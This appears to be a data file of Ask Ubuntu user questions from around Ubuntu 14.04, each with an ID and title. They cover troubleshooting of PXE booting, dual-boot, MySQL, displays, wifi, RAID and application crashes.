457915	ubuntu pxe cluster attached to network , but no internet	so i have a bit of a problem . i started a pxe cluster of ubuntu zorin using vmlinuz-3.13-24 . my server is running ubuntu server 14.04 which runs my tftp and nfs servers . i have a microtik router that i am using as my dhcp server and to send the location and file of the tftp server . everything boots up fine , i can even boot up multiple computers from the same file . but i do not have internet access . i am connected to the network , i can access the server , router , network drives , but no internet . i have tried to manually set it up but it still does n't connect . if i click on the not connected icon it doesnt give me an ethernet network attached , and it says not managed . is there a special internet server i must use for pxe ? ifconfig shows : eth0 link encap : ethernet hwaddr 08:00:27:13:57:1c inet addr:192.168.0.64 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fe13:571c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:473410 errors:0 dropped:3 overruns:0 frame:0 tx packets:135364 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:577914851 ( 577.9 mb ) tx bytes:22233809 ( 22.2 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:16 errors:0 dropped:0 overruns:0 frame:0 tx packets:16 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1184 ( 1.1 kb ) tx bytes:1184 ( 1.1 kb ) ` which matches the routers lease address . network manager shows : [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false i tried setting managed to true but that ended up breaking my pxe connection . and then it would just hang when it tried to boot . etc/network/interfaces shows # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback iface eth0 inet manual route -n pulls up kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 eth0 192.168.0.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 nslookup google.com pulled up timed out . im pretty new to ubuntu and networking in general , sooo im completely lost . any help would be much appreciated .
457918	ubuntu not booting after fixing windows and vice versa !	after i installed ubuntu 14.04 side to windows 8.1 , windows 8.1 was n't booting then i install boot-repair to restore mbr , after that windows 8.1 has been fixed and then ubuntu was n't booting then repeating using boot-repair and the loop did n't terminate ! ! please anyone help me ? ?
457920	how to point to boost built from source	i like to keep my boost installations full and up to date to the latest release . i just noticed that i sloppily approved libboost-dev-all , and some of my programs that i develop are not able to compile . i think i can fix the double install , but i prefer the installation from source . how can i point all of the applications that expect libboost packages to instead look for the libraries built and installed from source ?
457921	script to get mac and write in a file	my work needs to clone some thin clients and they use ubuntu as base to the vmware client , but the problem is we have to edit manually the line in the /etc/vmware/view-mandatory-config with the mac of the hardware . view.sslverificationmode = `` 3 '' view.defaultuser = `` cm-d4_85_64_71_58_44 '' view.autoconnectdesktop = `` true '' view.autoconnectbroker = `` true '' view.kiosklogin = `` true '' view.noninteractive = `` true '' view.fullscreen = `` true '' view.nomenubar = `` true '' view.defaultbroker = `` viewcs '' we need to create a script that run automatically at boot ( 1 time and delete it self ) and get the mac of eth0 and past it like in the config file above . view.defaultuser = `` cm-d4_85_64_71_58_44 '' we need this so we can save a lot of time . -- -edit -- - with what was answered i did the following script , still incomplete but is working . mac= $ ( ifconfig eth0 | grep -o -e ' ( [ [ : xdigit : ] ] { 1,2 } : ) { 5 } [ [ : xdigit : ] ] { 1,2 } ' ) echo `` view.sslverificationmode = *3* view.autoconnectdesktop = *true* view.autoconnectbroker = *true* view.kiosklogin = *true* view.noninteractive = *true* view.fullscreen = *true* view.nomenubar = *true* view.defaultbroker = *viewcs* view.defaultuser = *cm- $ { mac// : /_ } * '' > /etc/vmware/view-mandatory-config ; sed -i 's/*/ '' /g ' /etc/vmware/view-mandatory-config is incomplete because , i do n't know how to print ( `` ) in the file so i 've used * and after i used `` sed '' to change * to ( `` ) , it 's working like a charm . i do n't know why but i was not able to make this script run in boot . first , i set it into /etc/rc.local and it did not ran . second , i tried to put it in crontab as @ reboot /etc/vmware/mac.sh , and it not worked . thanks for your help .
457923	why did installation of mysql 5.6 on ubuntu 14.04 fail ?	i wanted to get a look at mysql 5.6 on ubuntu 14.04 just out of curiosity . and based on this article it certainly looked like installation should be simple and straightforward . so i fired up an aws ec2 micro server running ubuntu 14.04 ( 64-bit ) , logged into my pristine instance ( via putty ) , and issued the following commands : $ sudo apt-get update $ sudo apt-get build-dep mysql-server-5.6 $ sudo apt-get install mysql-server-5.6 ( the first two commands were desperation moves , since simply running apt-get install alone had previously not worked . but even with all three commands , the install step still did not work . ) at the point where i expected , based on the article referenced above , to see this output from the final command : mysql start/running , process 2355 setting up libhtml-template-perl ( 2.95-1 ) ... setting up mysql-common-5.6 ( 5.6.16-1~exp1 ) ... processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... processing triggers for ureadahead ( 0.100.0-16 ) ... i got this instead : start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing package mysql-server-5.6 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up libhtml-template-perl ( 2.95-1 ) ... setting up mysql-common-5.6 ( 5.6.16-1~exp1 ) ... processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... processing triggers for ureadahead ( 0.100.0-16 ) ... errors were encountered while processing : mysql-server-5.6 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) can anyone see what went wrong ?
457935	can not start nautilus or any other app via gksu anymore	i am running ubuntu 14.04 64bit on my dell xps 13 laptop , and up until now i was able to start nautilus via terminal or by using alt+f2 and typing gksu nautilus through dash . only now , supposedly after i upgraded the system via update manager where unity package got updated , i can not do it anymore . when trying to launch it via alt+f2 i can see a cogwheel moving instead of a cursor , and if i do it with terminal gksu nautilus it shows me this gksu nautilus ** ( gksu:6420 ) : critical ** : fcntl error ** ( gksu:6420 ) : warning ** : lock taken by pid : -1 . exiting . if i launch it with sudo command , everything works as expected . the question is , is it a bug ( which means i will report it immediately ) , or is it a known issue and there is a workaround i can try already ? thanks !
457936	mysql import never completing	i wrote a bash script , and here is my problem . the script run for hours , and it never completes . i see the mysql import process finish , but the script never gets any further . i have tried adding an echo after the mysql command , but i do n't see that echo either . it 's like i never get the message that mysql is complete . here is the code for the bash script : # ! /bin/bash password= '' password '' db= '' dbname '' file=`date + % y % m % d`. $ db.sql gunzip $ file.gz mysql -u $ user -p $ password < $ file yest= date -d `` yesterday 13:00 `` '+ % y % m % d'. $ db.sql rm -f $ yest echo done update : logged this import and i see : 55 query unlock tables 55 query /* ! 40103 set time_zone= @ old_time_zone */ 55 query /* ! 40101 set sql_mode= @ old_sql_mode */ 55 query /* ! 40014 set foreign_key_checks= @ old_foreign_key_checks */ 55 query /* ! 40014 set unique_checks= @ old_unique_checks */ 55 query /* ! 40101 set character_set_client= @ old_character_set_client */ 55 query /* ! 40101 set character_set_results= @ old_character_set_results */ 55 query /* ! 40101 set collation_connection= @ old_collation_connection */ 55 query /* ! 40111 set sql_notes= @ old_sql_notes */ 55 quit as the last command in the logs , which is the last command in the sql file as well . this is where it hangs ...
457938	can not set other resolution at virtualbox guest : elementary os	i 've installed virtualbox and also the extras that are posted here in other questions . but i have n't managed to set a higher resolution . the only ones that are available are : 1024x768 800x600 as mentioned at the question title , the host is ubuntu 12.10 , and the guest is elementary os luna . what can i do ?
457946	which diashow viewer has a shuffle functionality ?	i would like to see all images in my image-library in a diashow with a shuffled order . i tried some viewers , but they do n't get along with my 100gb of photos or they wanted me to copy all folders in a library which is not desired .
457949	missing ubuntu animations	i recently reinstalled my nvidia drivers & ever since then my gui has been acting different . e.g - i ca n't see the workspace switching transition animation , workspace switches when switching between windows etc . i 've tried changing setting through compiz but it did n't really work . i 've a feeling that it has something to do with gui being used but i 'm not sure what is it . can anyone help me with this ? thanks .
457950	how to install windows 8 after ubuntu	i have 3 partitions two are ntfs and the other is ext4 for ubuntu 14.04 lts . i want to install windows 8 on one of the ntfs partitions and a dual boot with ubuntu . i got the usb drive ready to install windows 8. i do n't know anything after this and im afraid that something would goes wrong like only access to win8 .
457951	can not boot onto ubuntu sever 14.04 unless i have the istallation usb connected	after i installed ubuntu server 14.04 by usb normally with using lvm in 1 hdd . it outputed a massage that said please make sure to remove the installation cd reboot . it goes normally until here , so i just unplug the usb and i waited for the reboot . it installed nothing to my hard drive . so i try reinstalling it , and it worked fined . after that , it goes to the ubuntu server login command line normally . but the problem is i ca n't boot with the installation usb .
457953	sound buttons not working after ubuntu 14.04 upgrade	i upgraded from 13.10 to 14.04 and now the built-in sound buttons ( up , down , mute ) on my dell d630 do not work . additionally , the brightness fn keys work but have no on-screen display like they used to . perhaps these are related ?
457957	plug and play device for laptop to connect external monitor/keyboard/mouse	i am looking for an easy solution that is basically plug and play where i can take my ubuntu laptop and connect it to a device which is my desktop setup and connects external monitor/keyboard/mouse . so i still use my laptop , but with desktop peripherals . i may sound lazy , but i will do this on a daily basis at work and take the laptop home with me when i am done , and i do n't want to plug in 3 usb-cables and plug out to the laptop every day . i want 1 . and i do n't want to set screen resolutions and adjust things every single time i plug it in . the external peripherals should just `` take over '' directly when i plug it in . what is a device like this called that works with ubuntu ? is a usb-hub enough ? thanks .
457958	ubuntu installation formatted all partitions , can i recover my data ?	initially i had windows installed and recently i wanted to install ubuntu 14.04 on my laptop . in windows i did have 5 partitions of each size 100 gb . in one 100 gb partition ( c : drive ) i used to install windows 7 . but while trying install ubuntu , there was an option to either install ubuntu on side of windows or install ubuntu completely ( and it said that windows 7 related files would be deleted/erased . i pre-assumed that it would install ubuntu in c : drive ( one 100 gb ) partition only . but looks like that is not the case , as in ubuntu 's disk , its showing hard disk as complete 500 gb , instead of different partitions . why did ubuntu deleted and merged all partitions ? in one of other partition of 100 gb , i did have some important document , but are deleted right now . how can i recover my data ? is it possible to recover the partitions back ? please help
457959	my / filesystem is running at 100 % need to re-volume to add more space .	i 've deleted and move lots of logs and files , but still says `` avial '' is 0 . what gives ? this is what i have filesystem type size used avail use % mounted on /dev/md1 ext4 56g 54g 0 100 % / udev devtmpfs 3.0g 4.0k 3.0g 1 % /dev tmpfs tmpfs 1.2g 652k 1.2g 1 % /run none tmpfs 5.0m 0 5.0m 0 % /run/lock none tmpfs 3.0g 0 3.0g 0 % /run/shm /dev/sdc1 ext4 1.8t 731g 1.1t 40 % /srv/bkp02 /dev/sdd1 ext4 1.8t 816g 1018g 45 % /srv/bkp03 overflow tmpfs 1.0m 0 1.0m 0 % /tmp /dev/sdi1 ext4 3.6t 2.5t 1.2t 70 % /srv/offbk1 /dev/md2 ext4 5.4t 4.1t 1.4t 75 % /srv/bkp01 /dev/md6 ext4 1.8t 959g 803g 55 % /srv/bkp00
457962	valid ssh command to create a raid5 ?	valid ssh commands for creating and rebuilding raid5 with 4 drives : to create a raid5 with 4 hard drives : mdadm -- create /dev/md1 -- level=5 -- raid-devices=4 /dev/hd [ abcd ] 5 to rebuild a raid5 with 4 hard drives : mdadm -- assemble /dev/md1 /dev/sda2 /dev/sdb2 /dev/sdc2 /dev/sdd2
457963	is a partial upgrade safe to do on old computer ?	i want to update all the software on it without upgrading to to any newer version of ubuntu . when i use the update manager tool it popup a massage that says i need to do a partial upgrade . i have tried this once before and it broke my ubuntu install , so i am reimageing the computer with dd to my hard disk and starting over . what can i do to upgrade my computer safely ?
457966	vlc crashes on xubuntu 14.04	xubuntu 14.04 64 bit . i used vlc media player 2.1.2 rincewind ( revision 2.1.2-0-ga4c4876 ) . i also tried the daily builds , 2.2.0 . vlc crashes . i opened a bug report at vlc 's bug tracker , they asked for backtrace # 0 strlen ( ) at ../sysdeps/x86_64/strlen.s:106 # 1 0x00007fffe884d7a0 in mkdirhier ( ) from /usr/lib/libtar.so.0 # 2 0x00007fffe884c19d in tar_extract_dir ( ) from /usr/lib/libtar.so.0 # 3 0x00007fffe884c3fb in tar_extract_file ( ) from /usr/lib/libtar.so.0 # 4 0x00007fffe884dc32 in tar_extract_all ( ) from /usr/lib/libtar.so.0 # 5 0x00007fffe8ab5bfb in ? ? ( ) from /usr/lib/vlc/plugins/gui/libskins2_plugin.so # 6 0x00007fffe8ab6c48 in ? ? ( ) from /usr/lib/vlc/plugins/gui/libskins2_plugin.so # 7 0x00007fffe8ab73cb in ? ? ( ) from /usr/lib/vlc/plugins/gui/libskins2_plugin.so # 8 0x00007fffe8ab2854 in ? ? ( ) from /usr/lib/vlc/plugins/gui/libskins2_plugin.so # 9 0x00007ffff79a8182 in start_thread ( arg=0x7fffeb2d7700 ) at pthread_create.c:312 # 10 0x00007ffff74d130d in clone ( ) at ../sysdeps/unix/sysv/linux/x86_64/clone.s:111 ( gdb ) i also gave them this file , they closed my ticket and labelled it incomplete . i just want to know if it 's a bug or not . if it 's a bug , i 'll reopen the ticket , i will delete this question . if it 's not a bug , then how to fix it ? everything was working fine on 13.10 . update i 'm not interested in fixing this bug anymore . mplayer with umplayer offer me many more features than vlc . i 'll accept the only answer and vote it up just to close this post , although i have n't tried it . i 'll leave that question for its value , maybe someone else has the same problem , and maybe he 'll find a solution by reading this post .
457967	can i use xdotool as an auto-clicker ?	is there a way i can use xdotool to perform a certain number of mouse clicks per second while holding down a certain key ?
457968	having a problem with xorg.conf for a problematic monitor	i have two westinghouse 26 '' l2610nw monitors that i run off of a geforce gt x660 . the graphics card has two dvi ( one digital , one analog ) , and an hdmi out . i run my primary display ( screen 0 ) off of the analog dvi port converted to vga to plug into the monitor . the second monitor has to go in either the digital dvi or the hdmi port . herein lies the problem : the l2610nw monitors incorrectly report their refresh rates through edid . this causes the monitor to show `` out of range '' whenever trying to run at 1920 x 1200 resolution , even though it is perfectly capable of it . i found a workaround for windows listed here : http : //osardar.net/blog/ ? p=11 using this solution , i am able to successfully run the second monitor in windows at 1920 x 1200 . it creates a new .inf file to use as a driver override . ( below this explanation i have posted the .inf contents ) unfortunately i have not been able to get this to work in any form of linux . i have tried using nvidia-settings and manually editing xorg.conf to force the refresh rate to 60hz ( which is supposedly what is needed ) , but it does n't work . nvidia-settings detects the second monitor but is unable to do anything with it . can someone please tell me exactly what settings are contained in this .inf file that i can make x recognize so i can use my two displays ? ! monitor.inf contents : ; inf file generated by monitor asset manager ( 2.60.0.972 ) , 4/5/2013 ; copyright ( c ) entech taiwan , 1995-2011. ; internet : http : //www.entechtaiwan.com [ version ] signature= '' $ windows nt $ '' class=monitor classguid= { 4d36e96e-e325-11ce-bfc1-08002be10318 } provider= % mfg % driverver=4/5/2013 , 1.0.0.0 ; catalogfile=yoursignedcatalogfile.cat [ destinationdirs ] defaultdestdir=23 [ sourcedisksnames ] 1= % disc % [ sourcedisksfiles ] ; yourcolorprofilefile.icm [ manufacturer ] % vendor % =edid_override , ntx86 , ntamd64 [ edid_override.ntx86 ] % productid % =overridden-edid.install , monitor\wde1478 [ edid_override.ntamd64 ] % productid % =overridden-edid.install.ntamd64 , monitor\wde1478 [ overridden-edid.install.ntx86 ] delreg=del_current_reg addreg=overridden-edid.addreg , mode1 , dpms copyfiles=overridden-edid.copyfiles [ overridden-edid.install.ntamd64 ] delreg=del_current_reg addreg=overridden-edid.addreg , mode1 , dpms copyfiles=overridden-edid.copyfiles [ overridden-edid.install.ntx86.hw ] addreg=overridden-edid_addreg [ overridden-edid.install.ntamd64.hw ] addreg=overridden-edid_addreg [ overridden-edid_addreg ] ; base edid hkr , edid_override , '' 0 '' ,0x01,0x00,0xff,0xff,0xff,0xff,0xff,0xff,0x00,0x5c,0x85,0x78,0x14,0x00,0x00,0x00,0x00,0x0c,0x12,0x01,0x03,0x68,0x37,0x1f,0x78,0x2e,0xc5,0x85,0xa4,0x59,0x49,0x9a,0x24,0x12,0x50,0x54,0x3f,0xcf,0x00,0x81,0x00,0xd1,0x00,0x95,0x00,0xb3,0x00,0xa9,0x40,0xd1,0x00,0x01,0x01,0x01,0x01,0x28,0x3c,0x80,0xa0,0x70,0xb0,0x23,0x40,0x30,0x20,0x36,0x00,0x26,0x35,0x21,0x00,0x00,0x1a,0x00,0x00,0x00,0xfd,0x00,0x38,0x4b,0x1e,0x50,0x15,0x00,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x00,0x00,0x00,0xff,0x00,0x30,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x00,0x00,0x00,0xfc,0x00,0x4c,0x32,0x36,0x31,0x30,0x4e,0x57,0x0a,0x20,0x20,0x20,0x20,0x20,0x00,0xc0 [ del_current_reg ] hkr , modes hkr , edid_override hkr , ,maxresolution hkr , ,preferredmode hkr , ,dpms hkr , ,icmprofile [ dpms ] hkr , ,dpms , ,1 hkr , ,preferredmode , , '' 1920,1200,60 '' [ mode1 ] hkr , ,maxresolution , , '' 1920,1200,60 '' [ overridden-edid.addreg ] hkr , '' modes\1920,1200,60 '' , mode1 , , '' 30.0-80.0,56.0-75.0 , + , + '' [ overridden-edid.copyfiles ] ; yourcolorprofilefile.icm for non-srgb displays [ strings ] mfg= '' entech taiwan '' disc= '' monitor edid override installation disk '' productid= '' westinghouse l2610nw ( wde1478 edid override ) '' vendor= '' westinghouse ''
457969	no printer icon in ubuntu 14.04 system settings	when i upgraded from 12.04 i had a problem booting till i changed ro to rw in boot files . but my current problem is that i can not see a printer icon in system settings , and how do i fix it .
457970	how to completely disable floppy in ubuntu 14.04 ?	so i upgraded from ubuntu 12.04 to 14.04 and now i see floppy in my home folder tree how do i remove it ? what i did since ubuntu 12.04 is : edit /etc/fstab to remove reference to floppy . edit /etc/modprobe.d/blacklist and add this line at the end : blacklist floppy run : sudo update-initramfs -u run : sudo update-grub restarted the system . i checked /etc/modprobe.d/blacklist it contains blacklist floppy like it was before the upgrade but now i can see floppy in my home folder tree . is there something else i need to change in 14.04 ?
457971	how save thumbnail listing of images and videos ?	how save thumbnail listing of images and videos ? for example , the default file/dir navigator ( nautilus , i think ) shows a tiled thumbnail view . just ca n't find a way to save the entire thumbnail set as a single file .
457974	ubuntu dual screen issure	i have a dual monitor setup and my mourse seems to lock on the side launcher but then it frees itself after about a second . update : i have found the solution : so i after some searching i found my solution to my answer . this is my solution click here .
457976	steam does n't start	xubuntu 14.04 64 bit . i installed steam maybe 2 months ago , without using the 32 bit libs or anything . it worked until yesterday , it prompted me for updates , i refused to updated it , could n't start it since then . the ternminal output $ steam running steam on ubuntu 14.04 64-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/crash_20140504021210_1.dmp /home/elie/.local/share/steam/steam.sh : line 755 : 18302 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' mv : can not stat ‘/home/elie/.steam/registry.vdf’ : no such file or directory installing bootstrap /home/elie/.local/share/steam/bootstrap.tar.xz reset complete ! restarting steam by request ... running steam on ubuntu 14.04 64-bit steam_runtime has been set by the user to : /home/elie/.local/share/steam/ubuntu12_32/steam-runtime installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/crash_20140504021213_1.dmp /home/elie/.local/share/steam/steam.sh : line 755 : 18432 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' finished uploading minidump ( out-of-process ) : success = yes response : crashid=bp-548166d2-e868-46b4-ac37-b548b2140503 finished uploading minidump ( out-of-process ) : success = yes response : crashid=bp-132434a3-69e3-4dff-96fe-a2be32140503 i tried all the solution from the previous questions , askubuntu is full of steam problems , installing 32 bit libs , updating my system , upgrading , reinstalling , deleting appcache ... i tried everything . i also tried to launch my games from some folder mentioned in a previous question without using the steam platform , it did n't work . but even if it did , that 's not a solution . update issue solved , i had to use xorg , when i did , steam opened and downloaded the update , when that 's done , i went back to fglrx and steam seems to be working .
457977	how do i give icon titles more space to display text ?	i 'm currently using ubuntu 12.04 . i use a size 15 font to display all fonts on my computer and i 've noticed that if certain applications have a longer name that consists of two or three words they get truncated or replaced with ellipses . how do i make it so that the icon titles wrap the text of the second or third word to a new line directly below the first title line or just allocate more space so that they are not truncated but visibly display the full name ? thank you to anyone who may be of service here and i look forward to hearing from you .
457978	no sound from chrome , sound works fine in firefox etc ( 13.10 )	i 'm running 13.10 ( all up-to-date ) on a lenovo laptop with a griffin imic usb audio device . though i occasionally have to use the pulse audio volume control tool to re-select the imic , it works consistently from everything on the system except chrome , which basically has no audio at all . with most applications that want to use the audio stuff , you see something in the first tab of pavucontrol . not chrome ; there 's just nothing . some ancient forum posts here and there suggested symlinking the firefox `` plugins '' directory over to chrome 's installation directory , which seems pretty goofy and which does n't work now anyway . chrome version is 34.0.1847.132 . is there some trick to making chrome work with a usb audio device ? ( as far as i can tell it does n't work with built-in audio either ... )
457980	how to share external hard drives with multipe users	i 'm used to having multiple hard drives connected to my machine and multiple user accounts that could all access the drives without any special permissions or set up . since the upgrade from 12.04 to 14.04 the drives are mounted by the first user to log in and can not be accessed by other users unless the drive is unmounted first by the first user . drives are mounted under `` /media/username/name '' of drive instead of `` /media/name of drive '' . i find it strange that not more people seem to be having issues with this since it is clearly a change in the way the system behaves , not in something i do different . any pointers on a solution ?
457983	how can i get my webcam to work with ubuntu 14.04 ?	i have an hp elitebook 850 g1 , and installed a fresh copy of ubuntu 14.04 , however ubuntu is not detecting the built-in webcam . is there any ways to fix this , and why this is happening ? output of the lsusb bus 001 device 002 : id 8087:8000 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 002 : id 0424:5534 standard microsystems corp . bus 003 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 002 device 003 : id 138a:003f validity sensors , inc . bus 002 device 004 : id 8087:07dc intel corp . bus 002 device 002 : id 0424:2134 standard microsystems corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
457986	very slow , intermittent wifi speeds with 14.04 and intel pro/wireless 5100 agn [ shiloh ]	i did a fresh install of ubuntu 14.04 lts on the harddisk of a lenovo y650 ideapad laptop . the wireless adapter is an intel pro/wireless 5100 agn [ shiloh ] . initially i could not connect to any wireless networks ; however , i could see them . there are no issues when connecting via ethernet . i was only able to connect to the wireless network by entering this command in the terminal : echo `` options iwlwifi 11n_disable=1 '' | sudo tee /etc/modprobe.d/iwlwifi.conf the speeds are extremely slow and intermittent . when i am able to run a speed test , the ping is good ( 24 to 26 ms ) but the download speeds range from 0.15 to 0.30 mbps . iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11abg essid : '' pinkrabbit '' mode : managed frequency:2.412 ghz access point : e8:40 : f2 : cd:18:0b bit rate=2 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-26 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:3 invalid misc:254 missed beacon:0 ifconfig eth0 link encap : ethernet hwaddr 00:23:5a : d2:70:91 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:171 errors:0 dropped:0 overruns:0 frame:0 tx packets:171 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:15613 ( 15.6 kb ) tx bytes:15613 ( 15.6 kb ) wlan0 link encap : ethernet hwaddr 00:1e:65:3e:0c:48 inet addr:192.168.0.13 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :21e:65ff : fe3e : c48/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:42 errors:0 dropped:0 overruns:0 frame:0 tx packets:96 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:9032 ( 9.0 kb ) tx bytes:16851 ( 16.8 kb ) nm-tool networkmanager tool state : connected ( global ) - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : tg3 state : unavailable default : no hw address : 00:23:5a : d2:70:91 capabilities : carrier detect : yes wired properties carrier : off - device : wlan0 [ pinkrabbit ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : iwlwifi state : connected default : yes hw address : 00:1e:65:3e:0c:48 capabilities : speed : 1 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) *pinkrabbit : infra , e8:40 : f2 : cd:18:0b , freq 2412 mhz , rate 54 mb/s , strength 92 wpa wpa2 ipv4 settings : address : 192.168.0.13 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 64.71.255.204 dns : 64.71.255.198 dns : 8.8.8.8 dns : 8.8.4.4
457990	i cant open folders as root	when i try to open the themes folder using this command gksu nautilus /usr/share/themes this is what the system throws back at me ( nautilus:21515 ) : glib-gobject-warning ** : invalid cast from 'gtkmessagedialog ' to 'nautiluswindow' ** error : nautilus-window.c:2116 : nautilus_window_get_slots : assertion failed : ( nautilus_is_window ( window ) ) maybe i 'm not typing the right command , please help , i ca n't access my folders as root ...
457992	boot up problem	i tried to install ubuntu 14.04 on my windows 8 laptop . i am getting this error : error : no such partition entering rescue mode grub rescue > i used boot repair to get this boot info script : http : //paste.ubuntu.com/7350067/ i am new to linux os.any help here is appreciated . thanks .
457993	how do i create a readable/writeable medium on a micro sd card	i recently got a micro sd card for the use with my phone . it 's 8gb in size and branded by samsung . i bought it second-hand , and for some reason it wo n't mount properly on my huawei phone running android 4.1 . so i connected it as an installer in ubuntu , but it does n't read it at all , just my phone 's iso for installing drivers . i open up disks and it recognizes it fine , but says no medium where the partition should be . i tried formatting there , but there 's no option . then i tried using fdisk in the terminal , but it comes up with an error saying the same no medium . i 've also tried gparted , but that does n't even recognize the card . i 'm running android 4.1 and ubuntu 14.04 , and to my knowledge it was supposed to have the fat32 partition . does anyone know a solution ? any help will be appreciated . ^_^ edit : well i seem to have solved the problem with my external sd card but the internal one is still buggered up .
457994	is there a way to set bootif in dnsmasq equivalent to isc-dhcpd ?	it would seem that isc-dhcpd sends bootif parameter for pxe booting clients . the initramfs-tools package detects this and uses the bootif variable to determine which interface to set up for the root file system . when you only have one nic in the machine it works . when you have multiple nic 's it 's a problem and it wo n't boot . so recent versions of initramfs-tools use bootif to work it out . unfortunately , dnsmasq does n't set this . is there a way i can send to the client in a way that is compatible with isc-dhcpd ? 01- $ mac_address basically i 'm wanting to have to avoid installing isc-dhcpd + tftp server on my system when dnsmasq is already working and is great for testing . a real world deploy will probably use isc-dhcpd .
457996	ls command not giving true file size	( newbie - just signed up ) i am wondering why when i type the ls -l , ls -lh etc , why it gives the size of my download file as 4 kilobytes when it is actually 20.7 gigabytes when i click properties on the gui . i have looked at previous questions but did not find an answer to this seeming anomoly . thanks . the other thing is being a newbie i hope i can find my question post again if there is a reply - not at all certain about this but have ticked the email reply box at least .
457997	how can i turn off the try live or install ubuntu option from a live usb 14.04 install ?	newb here . i tried the stuff i could find by changing the isolinux.cfg file , but my install seemed to become very unstable . i would like the usb to boot up automatically , but also land on a user screen and request a password . help please : )
457998	putting internal hard drive in another pc	if i install ubuntu on my current hard-drive , where this computer and the other computer are 64 bit , would this hard-drive work if i put it in the other computer ? i know microsoft os does n't allow that , so i 'd like to know if ubuntu is the same . they 're both sata .
457999	grub is still beta after upgrade to 14.04	after i upgraded to 14.04 the grub still says beta .
458000	ubuntu software updater can not find repository information . check your internet connection	i can not find what is causing the problem . any tips on how to go about diagnosing what is wrong ? also , updating takes too long . it just keeps on waiting for headers .
458001	problems installing unbuntu on a new hard drive	i just built a new system , fresh wd 1tb hdd . i downloaded the iso , ran the program to extract and install it to a usb jump drive . when i try to install ubuntu , i cant get past the 1st ubuntu screen , then it restarts the computer . please help , im new to linnux and ubuntu .
458002	difference between user account and guest account	i have a rather ancient computer ( pentium 4 with a really awful monitor ) that i have been running the ubuntu inspired elementary os for the past year or so flawlessly . for some reason yesterday when i go to put my username/password in ( i only have 1 account active ) , the screen goes black after i press enter and enter my credentials . i have tried ctrl-alt f5 , ctrl-alt-f4 and so on and this leads to nothing - no login prompts . the only solution is to reboot . i can ssh into the machine and get a terminal that way using this user though so that is a big plus . so even though this is happening , the guest account works perfectly fine . i can just click it and it will login to the gui no problem . what could cause the guest account to work with the gui and my user account to give me a black screen after my username/password is entered ? and more importantly , how can i fix this ?
458003	moving a maximized window between monitors without shrinking it	i work with 3 monitors ( though one currently not supported by ubuntu atm , but i 'm working on it ) , and in windows i was using this program called `` ultramon '' , which enables many nice and useful tools and tweaks for working with multiple monitors.. one of the features of this program is that it allows to move a maximized window between monitors , and just drop it anywhere on the other monitor , and it stays maximized on the target monitor ( actually it shrinks but immediately maximizes itself again - it probably recognizes that it was maximized on the original screen ) . i really would like to achieve the same behavior in ubunutu , as it really is a very nice and cool feature and it allows moving screen very intuitively , just `` drag and drop '' .. i use it a lot when i 'm working with several tabs opened on the browser , and i just want to detach one the tabs and throw in away in the other screen . i 'd really be happy if there is a built-in or external program\option to tweak the does this in ubuntu ( 14.04 ) . i really would like it to allow the `` drop '' of the window anywhere on the screen ( just like i do in windows ... ) , and not just sticking it to the top , which is the default way of achieving that .
